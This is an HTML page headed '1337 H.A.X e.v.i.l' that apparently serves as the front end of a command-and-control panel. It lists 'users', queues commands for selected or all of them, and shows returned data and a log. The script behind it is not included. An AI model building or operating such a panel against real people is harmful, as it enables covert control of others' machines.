<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<title>Control Tool</title>
		<style>

table, tr, td {
	border: 0;
}
body {
	background-color: #000;
	color: #fff;
	font-family: monospace;
	font-size: 15px;
}
textarea {
	display: block;
	width: 100%;
	background-color: #222;
	color: #fff;
}
button {
}
table button {
	width: 120px;
}
.highlight {
	background-color: #380;
}
#refresh {
	margin-bottom: 10px;
	width: 100%;
}
#users {
	margin-bottom: 10px;
}
#cmd {
	min-height: 200px;
}
#run_selected, #run_all {
	width: 200px;
}
#data {
	width: 49%;
	min-height: 250px;
	float: left;
}
#cmds {
	width: 49%;
	min-height: 250px;
	float: right;
}
#log {
	min-height: 150px;
}
.clear {
	clear: both;
}
		</style>
		<script src="jquery-2.1.3.min.js"></script>
		<script src="ctrl.js"></script>
	</head>
	<body>
		<h1>1337 H.A.X e.v.i.l</h1>
		<button id="refresh" onclick="refresh_users()">Refresh Users</button>
		<table id="users"></table>
		<textarea id="cmd"></textarea>
		<button id="run_selected" disabled="disabled" onclick="run_selected()" onkeypress="">Add Command for...</button>
		<button id="run_all" onclick="run_all()" onkeypress="">Add Command for ALL</button>
		<br />
		
		<br class="clear" />
		<textarea id="data" readonly="readonly"></textarea>
		<textarea id="cmds" readonly="readonly"></textarea>
		<br class="clear" />
		<br />
		
		<textarea id="log" readonly="readonly"></textarea>
	</body>
</html>